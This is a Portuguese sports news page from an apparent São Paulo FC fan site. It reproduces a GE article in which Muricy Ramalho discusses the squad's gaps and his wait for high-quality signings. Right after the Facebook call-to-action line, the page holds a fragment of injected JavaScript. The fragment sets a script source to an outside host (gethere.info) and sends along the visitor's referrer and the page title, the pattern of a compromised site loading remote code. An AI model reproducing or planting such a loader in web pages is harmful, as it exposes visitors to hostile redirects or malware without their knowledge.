Destaque

Paciente, Muricy espera reforços, mas descarta reforços ‘mais ou menos’

Muricy Ramalho faz um teste de paciência neste início de temporada. Vê buracos aos montes no elenco que sofreu para tirar o São Paulo do rebaixamento no Campeonato Brasileiro e, por enquanto, não sabe (e não tem) a quem recorrer. Resta esperar pelos reforços prometidos pela diretoria. Reforços com “R” maiúsculo.

– Não vai chegar por chegar. Aconteceu em outras situações de contratarem muitos jogadores, e agora não é o caso. Por isso, essa demora. Se chegar, são jogadores de qualidade, porque estamos com um elenco pequeno e precisamos qualificar um pouco para o ano todo. Oferecem muitos jogadores, mas não do nível que queremos. Deve chegar a qualquer momento – afirmou.

O time titular está longe de ser aquele dos sonhos do treinador, mas a grande preocupação é o conjunto. Muricy tem nada menos que sete zagueiros à disposição para, se quiser, implantar o 3-5-2 que o consagrou. Mas, no ataque, o único centroavante é Luis Fabiano, em guerra para voltar à boa fase. Para jogar ao lado dele, mais problemas. Só Osvaldo ou Ademilson.

– Não pode ser só um time, precisa ser um plantel. Temos posições com dificuldades de reposição. Não temos na posição do Luis Fabiano. Estamos desequilibrados desde o ano passado. Precisamos caprichar para não ser como no ano passado – disse.

Na sexta-feira, o São Paulo fechou a contratação de um reforço para um setor congestionado. Álvaro Pereira, lateral-esquerdo do Inter de Milão, chegará na próxima semana para brigar pela posição com Reinaldo, Carleto e Clemente Rodríguez. O clube ainda tem Henrique Miranda e Cortez, que não serão utilizados.

A busca do São Paulo por jogadores entupiu de ligações e mensagens o celular que Muricy carrega no bolso até durante as entrevistas coletivas. A maioria não agrada. Os alvos estão determinados: o volante Souza, do Grêmio, e o atacante Rafael Sobis, do Fluminense. O último, um sonho quase impossível pelos salários elevados.

– Estou tendo paciência com a diretoria porque quero jogadores de nível. Para trazer mais ou menos, é melhor não (trazer). Se eu peço algo difícil, sei que não vai ser fácil. Hoje não existe dinheiro, o futebol brasileiro está complicado.

Fonte: GE
Faça parte de nossa rede. Curta nossa pagina no Facebook, clicando aqui!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

4 + três =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

Muricy em ação para blindar o elenco!

saopauloadmin12 de janeiro de 2021

São Paulo é derrotado pelo Santos no Morumbi

saopauloadmin10 de janeiro de 2021

São Paulo e Reinaldo iniciam tratativas para renovação de contrato

saopauloadmin4 de janeiro de 2021

Brenner brilha, garante vitória do São Paulo sobre o Fluminense e faz Tricolor paulista disparar na ponta

saopauloadmin27 de dezembro de 2020

Na primeira partida da semifinal, São Paulo perde para o Grêmio

saopauloadmin24 de dezembro de 2020

Gabriel Sara: contrato renovado até 2024

saopauloadmin21 de dezembro de 2020

São Paulo bate Atlético-MG com autoridade e amplia vantagem na ponta

saopauloadmin17 de dezembro de 2020

Luciano desfalca o São Paulo em quantos jogos? Quando o atacante volta?

saopauloadmin14 de dezembro de 2020

Substituído com dores na coxa, Luciano vira dúvida para confronto com Atlético-MG

saopauloadmin13 de dezembro de 2020